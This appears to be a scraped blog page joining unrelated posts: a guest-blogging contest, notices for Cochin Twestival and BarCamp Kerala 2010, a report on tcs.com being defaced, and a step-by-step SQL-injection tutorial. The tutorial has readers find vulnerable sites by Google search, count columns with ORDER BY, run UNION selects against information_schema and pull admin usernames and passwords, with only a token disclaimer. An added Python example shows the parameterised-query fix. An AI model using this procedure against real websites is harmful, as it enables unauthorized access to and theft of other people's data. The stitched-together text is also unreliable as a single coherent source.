It’s February, the month of romance. It’s the shortest month of the year, and yet you end up spending the most. Yes, everyone wishes to make their valentine happy this month, and no one wants money to get in the way of seeing their lover smile. Well, then hurry up. BlogEngage is running a $500 USD guest-blogging contest. Just scribble out something on blogging with a true intention to enjoy the fun of a contest. I am sure you will end up writing a beautiful post. Still not ready to participate? Don’t let the opportunity slip away. BlogEngage is a big platform for bloggers, so I am sure all participants will see the feast.
So let’s meet the stunning sponsors who made this contest possible:
The Current Best of the Guest Blogger Sponsors
Last but not least: yes, I know you people have guessed it. I am participating in this stunning contest. You can find my post here.
Cochin Twestival 2010 will be held on March 25th, 2010 from 5 PM to 8 PM at Somewhere Else Cafe. Cochin Twestival is a mega tweet-up with lots of things added.
Hearing the word ‘Twestival’ for the first time?
It is a mega tweet-up with lots of things added. In short, it is a Twitter Festival. Twitter Festivals or Twestivals happen all around the globe once a year. There are basically two types of Twestivals: Twestival Global & Twestival Local. Twestival Global is one day, one cause all around the world and Twestival Local takes place over a weekend where cities are encouraged to support a local cause. Both versions have international momentum, but the real power of Twestival is when everything comes together on one day, giving focus to an important cause, the cause being different every year.
Twestival Cochin 2010 will be held at Somewhere Else Cafe. A map to the location is available at Twitter Kerala.
You can register for the event on the Facebook Event Page.
BarCamp Kerala 8 will be held on 28 March, 2010 at MACFAST, Thiruvala. BarCamp Kerala or BCK is the biggest and coolest techy event in Kerala.
Hearing the word ‘barcamp’ for the first time?
BarCamp is an ad-hoc gathering born from the desire for people to share and learn in an open environment. It is an intense event with discussions, demos and interaction from participants, who are the main actors of the event.
BCK 8 will be at MACFAST, Thiruvala. For more details, go here
You can register for the event on the BarCamp Kerala site. So far we have 65 attendees.
BarCamp Kerala So Far…
If you are still undecided about coming to BarCamp Kerala, check out these reports about the previous ones…
- First ever BarCamp in Kerala on November 24th, 2007
- BarCamp Kerala Part 5
- BarCamp Kerala 7 Live Blogging
- Barcamp Kerala LiveBlog
- BarCamp Kerala on May 3
First of all we must know what a ‘SQL injection’ is. So here is the Wikipedia definition: ‘SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application’. Here we will confine ourselves to SQL injections in web sites.
Now we need to find a site link which is likely to be vulnerable; most probably it will be of the form ‘http://www.site.com/abc.php?id=5’. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and pick a result.
1. Check the vulnerability by adding a single quote (') to the above link.
If you get an error message it means that the site is vulnerable to SQL injection.
Now you can be damn sure that the site is vulnerable to SQL injection.
2. Find out the number of columns
To find the number of columns we use the ORDER BY statement.
Just increment the number until we get an error.
http://www.site.com/abc.php?id=5 order by 1-- <-- no error
http://www.site.com/abc.php?id=5 order by 2-- <-- no error
http://www.site.com/abc.php?id=5 order by 3-- <-- no error
http://www.site.com/abc.php?id=5 order by 4-- <-- ERROR (we get some message like Unknown column ‘4’)
So we can conclude that the table has 4 columns.
3. Check whether UNION function works or not
http://www.site.com/abc.php?id=5 union all select 1,2,3--
We will get a number on the screen. Let’s say we get the number 2 at this step.
4. Check for MySQL version by replacing 2 in the above step by version()
http://www.site.com/abc.php?id=5 union all select 1,version(),3--
Now you can find the version from the site, and only if it is found to be above 5 can we continue to the next steps.
// If the version is lower than 5, then we will have to adopt some new methods which I will explain in some future post //
5. Use information_schema
Why do we use information_schema? The reason is very simple: ‘In MySQL 5 and higher versions, information_schema holds all tables and columns in the database’.
To get tables we use table_name and information_schema.tables
http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables--
6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
// PLEASE DON’T USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
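Why the quote, ORDER BY and UNION inputs in the steps above have any effect, and what stops them, shown as an added example that is not part of the original post. It assumes Python with an in-memory SQLite database in place of the PHP/MySQL site; the table, column and function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed sample table with 3 columns, standing in for the site's data.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(5, "widget", 10), (6, "gadget", 20)])
    return db

def lookup_concat(db, raw_id):
    # The 'before': the id value is pasted into the SQL text, so whatever
    # follows the number is parsed as SQL, and driver errors reach the caller.
    return db.execute(
        "SELECT id, name, price FROM items WHERE id = " + raw_id).fetchall()

def lookup_bound(db, raw_id):
    # The fix, in two layers: reject anything that is not a plain integer,
    # then pass the value as a bound parameter so it is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    try:
        return db.execute(
            "SELECT id, name, price FROM items WHERE id = ?",
            (int(raw_id),)).fetchall()
    except sqlite3.Error:
        return []  # log server-side; never echo the database error to the page

def outcome(fn, raw_id):
    # Run one handler on a fresh database and report rows or an error marker.
    try:
        return fn(make_db(), raw_id)
    except sqlite3.Error as exc:
        return "DB-ERROR: " + str(exc)

# Inputs taken from the steps above (the quote test, ORDER BY, UNION).
PAGE_INPUTS = ["5", "5'", "5 order by 3--", "5 order by 4--",
               "5 union all select 1,2,3--"]

if __name__ == "__main__":
    for value in PAGE_INPUTS:
        print(repr(value))
        print("  concatenated:", outcome(lookup_concat, value))
        print("  bound       :", outcome(lookup_bound, value))
```

With the bound handler every input other than a plain number returns an empty result and no database error text, so neither the error-based check in step 1 nor the column counting in step 2 gets a signal to work with.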
TCS.com, belonging to Tata Consultancy Services, was hacked earlier today, and it is claimed to be an attack over a DNS loophole.
Using nslookup, the difference between Google Public DNS and OpenDNS was studied.
On using nslookup with OpenDNS, the results for tcs.com and http://www.tcs.com were the same.
On using nslookup with Google Public DNS, the results for tcs.com and http://www.tcs.com were different.
For http://www.tcs.com the Address was 188.8.131.52 while for tcs.com it was 184.108.40.206.
Thanks to Albins for pointing out the difference.
The website http://www.tcs.com, which belongs to India’s IT giant Tata Consultancy Services, has been hacked by a French hacker. As I write this post, the TCS group has still not resolved the problem. It’s more likely that it is not a web software hack, but an attack through a DNS loophole.
If you visit TCS.com you will get a screenshot as shown below, telling that they have put up the domain name for sale.